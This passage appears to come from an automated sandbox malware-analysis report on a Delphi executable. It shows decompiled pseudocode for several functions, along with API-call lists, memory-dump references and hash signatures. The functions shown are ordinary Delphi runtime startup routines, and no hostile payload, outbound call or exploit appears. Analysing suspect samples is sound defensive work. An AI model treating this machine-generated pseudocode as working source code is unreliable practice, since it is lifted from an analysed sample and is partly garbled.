                                                                        • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 00405EBF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                        • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                        • API String ID: 1599918012-2375825460
                                                                        • Opcode ID: 40d43e4aa967ba0e44d00b39daf8816187a9c2091b90e9bc261389aedf9edc94
                                                                        • Instruction ID: a95c978ba0d7d151ab845f00ccb1e953877a4a526e1e70593208f9c5fde5a4dc
                                                                        • Opcode Fuzzy Hash: 40d43e4aa967ba0e44d00b39daf8816187a9c2091b90e9bc261389aedf9edc94
                                                                        • Instruction Fuzzy Hash: 6F318F71E0061C6AFB25D6B8DC46BDF6AAC8B04344F4401F7AA44F61C1E6789F848F94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00441B28, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 77%
                                                                        			E00441B28(void* __ecx, void* __edi, void* __esi) {
				intOrPtr _t6;
				intOrPtr _t8;
				intOrPtr _t10;
				intOrPtr _t12;
				intOrPtr _t14;
				void* _t16;
				void* _t17;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t28;

				_t25 = __esi;
				_t17 = __ecx;
				_push(_t28);
				_push(0x441bae);
				_push( *[fs:eax]);
				 *[fs:eax] = _t28;
				 *0x496b74 =  *0x496b74 - 1;
				if( *0x496b74 < 0) {
					 *0x496b70 = (GetVersion() & 0x000000ff) - 4 >= 0; // executed
					_t31 =  *0x496b70;
					E004418D8(_t16, __edi,  *0x496b70);
					_t6 =  *0x431d0c; // 0x431d58
					E00413838(_t6, _t16, _t17,  *0x496b70);
					_t8 =  *0x431d0c; // 0x431d58
					E004138D8(_t8, _t16, _t17, _t31);
					_t21 =  *0x431d0c; // 0x431d58
					_t10 =  *0x443240; // 0x44328c
					E00413884(_t10, _t16, _t21, __esi, _t31);
					_t22 =  *0x431d0c; // 0x431d58
					_t12 =  *0x441bb8; // 0x441c04
					E00413884(_t12, _t16, _t22, __esi, _t31);
					_t23 =  *0x431d0c; // 0x431d58
					_t14 =  *0x441d6c; // 0x441db8
					E00413884(_t14, _t16, _t23, _t25, _t31);
				}
				_pop(_t20);
				 *[fs:eax] = _t20;
				_push(0x441bb5);
				return 0;
			}















                                                                        0x00441b28
                                                                        0x00441b28
                                                                        0x00441b2d
                                                                        0x00441b2e
                                                                        0x00441b33
                                                                        0x00441b36
                                                                        0x00441b39
                                                                        0x00441b40
                                                                        0x00441b50
                                                                        0x00441b50
                                                                        0x00441b57
                                                                        0x00441b5c
                                                                        0x00441b61
                                                                        0x00441b66
                                                                        0x00441b6b
                                                                        0x00441b70
                                                                        0x00441b76
                                                                        0x00441b7b
                                                                        0x00441b80
                                                                        0x00441b86
                                                                        0x00441b8b
                                                                        0x00441b90
                                                                        0x00441b96
                                                                        0x00441b9b
                                                                        0x00441b9b
                                                                        0x00441ba2
                                                                        0x00441ba5
                                                                        0x00441ba8
                                                                        0x00441bad

                                                                        APIs
                                                                        • GetVersion.KERNEL32(00000000,00441BAE), ref: 00441B42
                                                                          • Part of subcall function 004418D8: GetCurrentProcessId.KERNEL32(?,00000000,00441A50), ref: 004418F9
                                                                          • Part of subcall function 004418D8: GlobalAddAtomA.KERNEL32 ref: 0044192C
                                                                          • Part of subcall function 004418D8: GetCurrentThreadId.KERNEL32 ref: 00441947
                                                                          • Part of subcall function 004418D8: GlobalAddAtomA.KERNEL32 ref: 0044197D
                                                                          • Part of subcall function 004418D8: RegisterClipboardFormatA.USER32 ref: 00441993
                                                                          • Part of subcall function 004418D8: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,00441A50), ref: 00441A17
                                                                          • Part of subcall function 004418D8: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00441A28
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: AtomCurrentGlobal$AddressClipboardFormatHandleModuleProcProcessRegisterThreadVersion
                                                                        • String ID:
                                                                        • API String ID: 3775504709-0
                                                                        • Opcode ID: 4af7d1e06e4179856b6cb7255ac9413e9ea182c3b4e7439e21792739542dd09b
                                                                        • Instruction ID: 2f7da0d823e8454f170ce9909db3841dc0363cc31ad963a92fe894f2ea070a63
                                                                        • Opcode Fuzzy Hash: 4af7d1e06e4179856b6cb7255ac9413e9ea182c3b4e7439e21792739542dd09b
                                                                        • Instruction Fuzzy Hash: C1F0497D6441809FD705FF2AFC52818B7B4E7467463A191BBF80093A32D638B981CB5D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004557F8, Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 37%
                                                                        			E004557F8(intOrPtr _a4) {
				intOrPtr _t26;

				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 8)));
				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 4)));
				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)))));
				_t26 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30));
				_push(_t26); // executed
				L00406D8C(); // executed
				 *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 0xc)) = _t26;
				return _t26;
			}




                                                                        0x00455804
                                                                        0x0045580e
                                                                        0x00455817
                                                                        0x0045581e
                                                                        0x00455821
                                                                        0x00455822
                                                                        0x0045582d
                                                                        0x00455831

                                                                        APIs
                                                                        • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 00455822
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: NtdllProc_Window
                                                                        • String ID:
                                                                        • API String ID: 4255912815-0
                                                                        • Opcode ID: b07c49574a18f71dbeb9c9cb54d623c337995a7866a732a5a16d698ec8b3bfc5
                                                                        • Instruction ID: 5803e6755cc40272ac919c0989782a04df59f5dce5c0c45c60d630398e48ec52
                                                                        • Opcode Fuzzy Hash: b07c49574a18f71dbeb9c9cb54d623c337995a7866a732a5a16d698ec8b3bfc5
                                                                        • Instruction Fuzzy Hash: 44F0C579215608AFCB40DF9DC588D4AFBE8BF4C260B058195BD88CB321C234FD808F94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00455364, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 130windowregistryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 42%
                                                                        			E00455364(void* __eax, void* __ebx, void* __ecx) {
				struct _WNDCLASSA _v44;
				char _v48;
				char* _t22;
				long _t23;
				CHAR* _t25;
				struct HINSTANCE__* _t26;
				intOrPtr* _t28;
				signed int _t31;
				intOrPtr* _t32;
				signed int _t35;
				struct HINSTANCE__* _t36;
				void* _t38;
				CHAR* _t39;
				struct HWND__* _t40;
				char* _t46;
				char* _t51;
				long _t54;
				long _t58;
				struct HINSTANCE__* _t61;
				intOrPtr _t63;
				void* _t68;
				struct HMENU__* _t69;
				intOrPtr _t76;
				void* _t82;
				short _t87;

				_v48 = 0;
				_t68 = __eax;
				_push(_t82);
				_push(0x4554fb);
				_push( *[fs:eax]);
				 *[fs:eax] = _t82 + 0xffffffd4;
				if( *((char*)(__eax + 0xa4)) != 0) {
					L13:
					_pop(_t76);
					 *[fs:eax] = _t76;
					_push(0x455502);
					return E00404348( &_v48);
				}
				_t22 =  *0x495b34; // 0x496048
				if( *_t22 != 0) {
					goto L13;
				}
				_t23 = E0041D260(E00455880, __eax); // executed
				 *(_t68 + 0x40) = _t23;
				_t25 =  *0x47ac08; // 0x45504c
				_t26 =  *0x496714; // 0x400000
				if(GetClassInfoA(_t26, _t25,  &_v44) == 0) {
					_t61 =  *0x496714; // 0x400000
					 *0x47abf4 = _t61;
					_t87 = RegisterClassA(0x47abe4);
					if(_t87 == 0) {
						_t63 =  *0x4958e4; // 0x41d574
						E00406548(_t63,  &_v48);
						E0040A17C(_v48, 1);
						E00403DA8();
					}
				}
				_t28 =  *0x495998; // 0x496a9c
				_t31 =  *((intOrPtr*)( *_t28))(0) >> 1;
				if(_t87 < 0) {
					asm("adc eax, 0x0");
				}
				_t32 =  *0x495998; // 0x496a9c
				_t35 =  *((intOrPtr*)( *_t32))(1, _t31) >> 1;
				if(_t87 < 0) {
					asm("adc eax, 0x0");
				}
				_push(_t35);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t36 =  *0x496714; // 0x400000
				_push(_t36);
				_push(0);
				_t7 = _t68 + 0x8c; // 0x29c80044
				_t38 = E004047F8( *_t7);
				_t39 =  *0x47ac08; // 0x45504c, executed
				_t40 = E00407340(_t39, 0x84ca0000, _t38); // executed
				 *(_t68 + 0x30) = _t40;
				_t9 = _t68 + 0x8c; // 0x44d55c
				E00404348(_t9);
				 *((char*)(_t68 + 0xa4)) = 1;
				_t11 = _t68 + 0x40; // 0x10ac0000
				_t12 = _t68 + 0x30; // 0xe
				SetWindowLongA( *_t12, 0xfffffffc,  *_t11);
				_t46 =  *0x495a04; // 0x496b70
				if( *_t46 != 0) {
					_t54 = E00455F58(_t68);
					_t13 = _t68 + 0x30; // 0xe
					SendMessageA( *_t13, 0x80, 1, _t54); // executed
					_t58 = E00455F58(_t68);
					_t14 = _t68 + 0x30; // 0xe
					SetClassLongA( *_t14, 0xfffffff2, _t58); // executed
				}
				_t15 = _t68 + 0x30; // 0xe
				_t69 = GetSystemMenu( *_t15, "true");
				DeleteMenu(_t69, 0xf030, 0);
				DeleteMenu(_t69, 0xf000, 0);
				_t51 =  *0x495a04; // 0x496b70
				if( *_t51 != 0) {
					DeleteMenu(_t69, 0xf010, 0);
				}
				goto L13;
			}




























                                                                        0x0045536d
                                                                        0x00455370
                                                                        0x00455374
                                                                        0x00455375
                                                                        0x0045537a
                                                                        0x0045537d
                                                                        0x00455387
                                                                        0x004554e5
                                                                        0x004554e7
                                                                        0x004554ea
                                                                        0x004554ed
                                                                        0x004554fa
                                                                        0x004554fa
                                                                        0x0045538d
                                                                        0x00455395
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004553a1
                                                                        0x004553a6
                                                                        0x004553ad
                                                                        0x004553b3
                                                                        0x004553c0
                                                                        0x004553c2
                                                                        0x004553c7
                                                                        0x004553d6
                                                                        0x004553d9
                                                                        0x004553de
                                                                        0x004553e3
                                                                        0x004553f2
                                                                        0x004553f7
                                                                        0x004553f7
                                                                        0x004553d9
                                                                        0x004553fe
                                                                        0x00455407
                                                                        0x00455409
                                                                        0x0045540b
                                                                        0x0045540b
                                                                        0x00455411
                                                                        0x0045541a
                                                                        0x0045541c
                                                                        0x0045541e
                                                                        0x0045541e
                                                                        0x00455421
                                                                        0x00455422
                                                                        0x00455424
                                                                        0x00455426
                                                                        0x00455428
                                                                        0x0045542a
                                                                        0x0045542f
                                                                        0x00455430
                                                                        0x00455432
                                                                        0x00455438
                                                                        0x00455444
                                                                        0x00455449
                                                                        0x0045544e
                                                                        0x00455451
                                                                        0x00455457
                                                                        0x0045545c
                                                                        0x00455463
                                                                        0x00455469
                                                                        0x0045546d
                                                                        0x00455472
                                                                        0x0045547a
                                                                        0x0045547e
                                                                        0x0045548b
                                                                        0x0045548f
                                                                        0x00455496
                                                                        0x0045549e
                                                                        0x004554a2
                                                                        0x004554a2
                                                                        0x004554a9
                                                                        0x004554b2
                                                                        0x004554bc
                                                                        0x004554c9
                                                                        0x004554ce
                                                                        0x004554d6
                                                                        0x004554e0
                                                                        0x004554e0
                                                                        0x00000000

                                                                        APIs
                                                                          • Part of subcall function 0041D260: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0041D27E
                                                                        • GetClassInfoA.USER32 ref: 004553B9
                                                                        • RegisterClassA.USER32 ref: 004553D1
                                                                          • Part of subcall function 00406548: LoadStringA.USER32 ref: 00406579
                                                                        • SetWindowLongA.USER32 ref: 0045546D
                                                                        • SendMessageA.USER32 ref: 0045548F
                                                                        • SetClassLongA.USER32(0000000E,000000F2,00000000,0000000E,00000080,00000001,00000000,0000000E,000000FC,10AC0000,0044D4D0), ref: 004554A2
                                                                        • GetSystemMenu.USER32(0000000E,00000000,0000000E,000000FC,10AC0000,0044D4D0), ref: 004554AD
                                                                        • DeleteMenu.USER32(00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10AC0000,0044D4D0), ref: 004554BC
                                                                        • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10AC0000,0044D4D0), ref: 004554C9
                                                                        • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10AC0000,0044D4D0), ref: 004554E0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Menu$ClassDelete$Long$AllocInfoLoadMessageRegisterSendStringSystemVirtualWindow
                                                                        • String ID: H`I$LPE$pkI
                                                                        • API String ID: 2103932818-880299876
                                                                        • Opcode ID: 38e60ad4ba9bda075d6a227e52a730b6c34eac7e6b991cc39a7723496a2c1f00
                                                                        • Instruction ID: dba36a22936c401213b48a9bdafbdde789661dbc4a9e7479afdc9c550058aeec
                                                                        • Opcode Fuzzy Hash: 38e60ad4ba9bda075d6a227e52a730b6c34eac7e6b991cc39a7723496a2c1f00
                                                                        • Instruction Fuzzy Hash: A2418E707446406FE711EBA9DC92F6A33A8AB45305F154476FE04EF2E3DA78A844872D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004418D8, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 103registrylibraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 85%
                                                                        			E004418D8(void* __ebx, void* __edi, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				long _v28;
				char _v32;
				char _v36;
				intOrPtr _t25;
				char _t29;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr* _t50;
				intOrPtr _t53;
				struct HINSTANCE__* _t63;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr _t83;
				void* _t87;

				_v20 = 0;
				_v8 = 0;
				_push(_t87);
				_push(0x441a50);
				_push( *[fs:eax]);
				 *[fs:eax] = _t87 + 0xffffffe0;
				_v16 = GetCurrentProcessId();
				_v12 = 0;
				E0040936C("Delphi%.8X", 0,  &_v16,  &_v8);
				E0040439C(0x496b7c, _v8);
				_t25 =  *0x496b7c; // 0x21508a8
				 *0x496b78 = GlobalAddAtomA(E004047F8(_t25));
				_t29 =  *0x496714; // 0x400000
				_v36 = _t29;
				_v32 = 0;
				_v28 = GetCurrentThreadId();
				_v24 = 0;
				E0040936C("ControlOfs%.8X%.8X", 1,  &_v36,  &_v20);
				E0040439C(0x496b80, _v20);
				_t35 =  *0x496b80; // 0x21508c4
				 *0x496b7a = GlobalAddAtomA(E004047F8(_t35));
				_t38 =  *0x496b80; // 0x21508c4
				 *0x496b84 = RegisterClipboardFormatA(E004047F8(_t38));
				 *0x496bbc = E00414744(1);
				E004414DC();
				 *0x496b6c = E00441304(1, 1);
				_t47 = E00453F78(1, __edi);
				_t78 =  *0x495c2c; // 0x496c08
				 *_t78 = _t47;
				_t49 = E0045505C(0, 1);
				_t80 =  *0x495ad0; // 0x496c04
				 *_t80 = _t49;
				_t50 =  *0x495ad0; // 0x496c04
				E00456B68( *_t50, 1);
				_t53 =  *0x430eb0; // 0x430eb4
				E004139C4(_t53, 0x4336c0, 0x4336d0);
				_t63 = GetModuleHandleA("USER32");
				if(_t63 != 0) {
					 *0x47a8a8 = GetProcAddress(_t63, "AnimateWindow");
				}
				_pop(_t83);
				 *[fs:eax] = _t83;
				_push(0x441a57);
				E00404348( &_v20);
				return E00404348( &_v8);
			}
























                                                                        0x004418e1
                                                                        0x004418e4
                                                                        0x004418e9
                                                                        0x004418ea
                                                                        0x004418ef
                                                                        0x004418f2
                                                                        0x004418fe
                                                                        0x00441901
                                                                        0x0044190f
                                                                        0x0044191c
                                                                        0x00441921
                                                                        0x00441931
                                                                        0x0044193b
                                                                        0x00441940
                                                                        0x00441943
                                                                        0x0044194c
                                                                        0x0044194f
                                                                        0x00441960
                                                                        0x0044196d
                                                                        0x00441972
                                                                        0x00441982
                                                                        0x00441988
                                                                        0x00441998
                                                                        0x004419a9
                                                                        0x004419ae
                                                                        0x004419bf
                                                                        0x004419cd
                                                                        0x004419d2
                                                                        0x004419d8
                                                                        0x004419e3
                                                                        0x004419e8
                                                                        0x004419ee
                                                                        0x004419f0
                                                                        0x004419f9
                                                                        0x00441a08
                                                                        0x00441a0d
                                                                        0x00441a1c
                                                                        0x00441a20
                                                                        0x00441a2d
                                                                        0x00441a2d
                                                                        0x00441a34
                                                                        0x00441a37
                                                                        0x00441a3a
                                                                        0x00441a42
                                                                        0x00441a4f

                                                                        APIs
                                                                        • GetCurrentProcessId.KERNEL32(?,00000000,00441A50), ref: 004418F9
                                                                        • GlobalAddAtomA.KERNEL32 ref: 0044192C
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00441947
                                                                        • GlobalAddAtomA.KERNEL32 ref: 0044197D
                                                                        • RegisterClipboardFormatA.USER32 ref: 00441993
                                                                          • Part of subcall function 00414744: RtlInitializeCriticalSection.KERNEL32(00411A90,?,?,004419A9,00000000,00000000,?,00000000,?,00000000,00441A50), ref: 00414763
                                                                          • Part of subcall function 004414DC: SetErrorMode.KERNEL32(00008000), ref: 004414F5
                                                                          • Part of subcall function 004414DC: GetModuleHandleA.KERNEL32(USER32,00000000,00441642,?,00008000), ref: 00441519
                                                                          • Part of subcall function 004414DC: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 00441526
                                                                          • Part of subcall function 004414DC: LoadLibraryA.KERNEL32(IMM32.DLL,00000000,00441642,?,00008000), ref: 00441542
                                                                          • Part of subcall function 004414DC: GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 00441564
                                                                          • Part of subcall function 004414DC: GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 00441579
                                                                          • Part of subcall function 004414DC: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 0044158E
                                                                          • Part of subcall function 004414DC: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 004415A3
                                                                          • Part of subcall function 004414DC: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 004415B8
                                                                          • Part of subcall function 004414DC: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 004415CD
                                                                          • Part of subcall function 004414DC: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 004415E2
                                                                          • Part of subcall function 004414DC: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 004415F7
                                                                          • Part of subcall function 004414DC: GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 0044160C
                                                                          • Part of subcall function 004414DC: GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00441621
                                                                          • Part of subcall function 004414DC: SetErrorMode.KERNEL32(?,00441649,00008000), ref: 0044163C
                                                                          • Part of subcall function 00453F78: GetKeyboardLayout.USER32 ref: 00453FBD
                                                                          • Part of subcall function 00453F78: 72E7AC50.USER32(00000000,00000000,?,?,00000000,?,004419D2,00000000,00000000,?,00000000,?,00000000,00441A50), ref: 00454012
                                                                          • Part of subcall function 00453F78: 72E7AD70.GDI32(00000000,0000005A,00000000,00000000,?,?,00000000,?,004419D2,00000000,00000000,?,00000000,?,00000000,00441A50), ref: 0045401C
                                                                          • Part of subcall function 00453F78: 72E7B380.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,?,?,00000000,?,004419D2,00000000,00000000,?,00000000,?), ref: 00454027
                                                                          • Part of subcall function 0045505C: LoadIconA.USER32(00400000,MAINICON), ref: 00455141
                                                                          • Part of subcall function 0045505C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,004419E8,00000000,00000000,?,00000000,?,00000000,00441A50), ref: 00455173
                                                                          • Part of subcall function 0045505C: OemToCharA.USER32(?,?), ref: 00455186
                                                                          • Part of subcall function 0045505C: CharLowerA.USER32(?,00400000,?,00000100,?,?,?,004419E8,00000000,00000000,?,00000000,?,00000000,00441A50), ref: 004551C6
                                                                        • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,00441A50), ref: 00441A17
                                                                        • GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00441A28
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: AddressProc$Module$AtomCharCurrentErrorGlobalHandleLoadMode$B380ClipboardCriticalFileFormatIconInitializeKeyboardLayoutLibraryLowerNameProcessRegisterSectionThread
                                                                        • String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32
                                                                        • API String ID: 2159221912-1126952177
                                                                        • Opcode ID: 672fa2b76e77dd81ba940745a36baf8dc5993c4f787a0357a88adb70a8aa1e99
                                                                        • Instruction ID: 0033b563d108e4a526ad8c315f1ec0427d91b7655410c97774380eaa5b0c3b7d
                                                                        • Opcode Fuzzy Hash: 672fa2b76e77dd81ba940745a36baf8dc5993c4f787a0357a88adb70a8aa1e99
                                                                        • Instruction Fuzzy Hash: 88415FB4A002459FCB00FFB5D88269D77F5EB99308B12543BE405E77A2EB39A9008B5D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0045505C, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 125windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 94%
                                                                        			E0045505C(void* __ecx, char __edx) {
				char _v5;
				char _v261;
				void* __ebx;
				void* __ebp;
				intOrPtr _t39;
				intOrPtr _t42;
				intOrPtr _t43;
				struct HINSTANCE__** _t53;
				struct HICON__* _t55;
				intOrPtr _t58;
				struct HINSTANCE__** _t60;
				void* _t67;
				char* _t69;
				char* _t75;
				intOrPtr _t81;
				intOrPtr* _t88;
				intOrPtr* _t89;
				intOrPtr _t90;
				void* _t91;
				char _t93;
				void* _t104;
				void* _t105;

				_t93 = __edx;
				_t91 = __ecx;
				if(__edx != 0) {
					_t105 = _t105 + 0xfffffff0;
					_t39 = E00403940(_t39, _t104);
				}
				_v5 = _t93;
				_t90 = _t39;
				E0041C1DC(_t91, 0);
				_t42 =  *0x495a48; // 0x47a468
				if( *((short*)(_t42 + 2)) == 0) {
					_t89 =  *0x495a48; // 0x47a468
					 *((intOrPtr*)(_t89 + 4)) = _t90;
					 *_t89 = 0x456690;
				}
				_t43 =  *0x495aec; // 0x47a470
				_t109 =  *((short*)(_t43 + 2));
				if( *((short*)(_t43 + 2)) == 0) {
					_t88 =  *0x495aec; // 0x47a470
					 *((intOrPtr*)(_t88 + 4)) = _t90;
					 *_t88 = E00456888;
				}
				 *((char*)(_t90 + 0x34)) = 0;
				 *((intOrPtr*)(_t90 + 0x90)) = E004035AC(1);
				 *((intOrPtr*)(_t90 + 0xa8)) = E004035AC(1);
				 *((intOrPtr*)(_t90 + 0x60)) = 0;
				 *((intOrPtr*)(_t90 + 0x84)) = 0;
				 *((intOrPtr*)(_t90 + 0x5c)) = 0x80000018;
				 *((intOrPtr*)(_t90 + 0x78)) = 0x1f4;
				 *((char*)(_t90 + 0x7c)) = 1;
				 *((intOrPtr*)(_t90 + 0x80)) = 0;
				 *((intOrPtr*)(_t90 + 0x74)) = 0x9c4;
				 *((char*)(_t90 + 0x88)) = 0;
				 *((char*)(_t90 + 0x9d)) = 1;
				 *((char*)(_t90 + 0xb4)) = 1;
				_t103 = E00425C8C(1);
				 *((intOrPtr*)(_t90 + 0x98)) = _t52;
				_t53 =  *0x49597c; // 0x49602c
				_t55 = LoadIconA( *_t53, "MAINICON"); // executed
				E0042605C(_t103, _t55);
				_t20 = _t90 + 0x98; // 0x736d
				_t58 =  *_t20;
				 *((intOrPtr*)(_t58 + 0x14)) = _t90;
				 *((intOrPtr*)(_t58 + 0x10)) = 0x456df8;
				_t60 =  *0x49597c; // 0x49602c
				GetModuleFileNameA( *_t60,  &_v261, 0x100);
				OemToCharA( &_v261,  &_v261);
				_t67 = E0040ACE8(0x5c, _t109);
				_t110 = _t67;
				if(_t67 != 0) {
					_t27 = _t67 + 1; // 0x1
					E00408C34( &_v261, _t27);
				}
				_t69 = E0040AD10( &_v261, 0x2e, _t110);
				if(_t69 != 0) {
					 *_t69 = 0;
				}
				CharLowerA( &(( &_v261)[1]));
				_t31 = _t90 + 0x8c; // 0x44d55c
				E004045B0(_t31, 0x100,  &_v261);
				_t75 =  *0x495874; // 0x496034
				if( *_t75 == 0) {
					E00455364(_t90, _t90, 0x100); // executed
				}
				 *((char*)(_t90 + 0x59)) = 1;
				 *((char*)(_t90 + 0x5a)) = 1;
				 *((char*)(_t90 + 0x5b)) = 1;
				 *((char*)(_t90 + 0x9e)) = 1;
				 *((intOrPtr*)(_t90 + 0xa0)) = 0;
				E00456FD4(_t90, 0x100);
				E00457914(_t90);
				_t81 = _t90;
				if(_v5 != 0) {
					E00403998(_t81);
					_pop( *[fs:0x0]);
				}
				return _t90;
			}

























                                                                        0x0045505c
                                                                        0x0045505c
                                                                        0x00455069
                                                                        0x0045506b
                                                                        0x0045506e
                                                                        0x0045506e
                                                                        0x00455073
                                                                        0x00455076
                                                                        0x0045507c
                                                                        0x00455081
                                                                        0x0045508b
                                                                        0x0045508d
                                                                        0x00455092
                                                                        0x00455095
                                                                        0x00455095
                                                                        0x0045509b
                                                                        0x004550a0
                                                                        0x004550a5
                                                                        0x004550a7
                                                                        0x004550ac
                                                                        0x004550af
                                                                        0x004550af
                                                                        0x004550b5
                                                                        0x004550c5
                                                                        0x004550d7
                                                                        0x004550df
                                                                        0x004550e4
                                                                        0x004550ea
                                                                        0x004550f1
                                                                        0x004550f8
                                                                        0x004550fe
                                                                        0x00455104
                                                                        0x0045510b
                                                                        0x00455112
                                                                        0x00455119
                                                                        0x0045512c
                                                                        0x0045512e
                                                                        0x00455139
                                                                        0x00455141
                                                                        0x0045514a
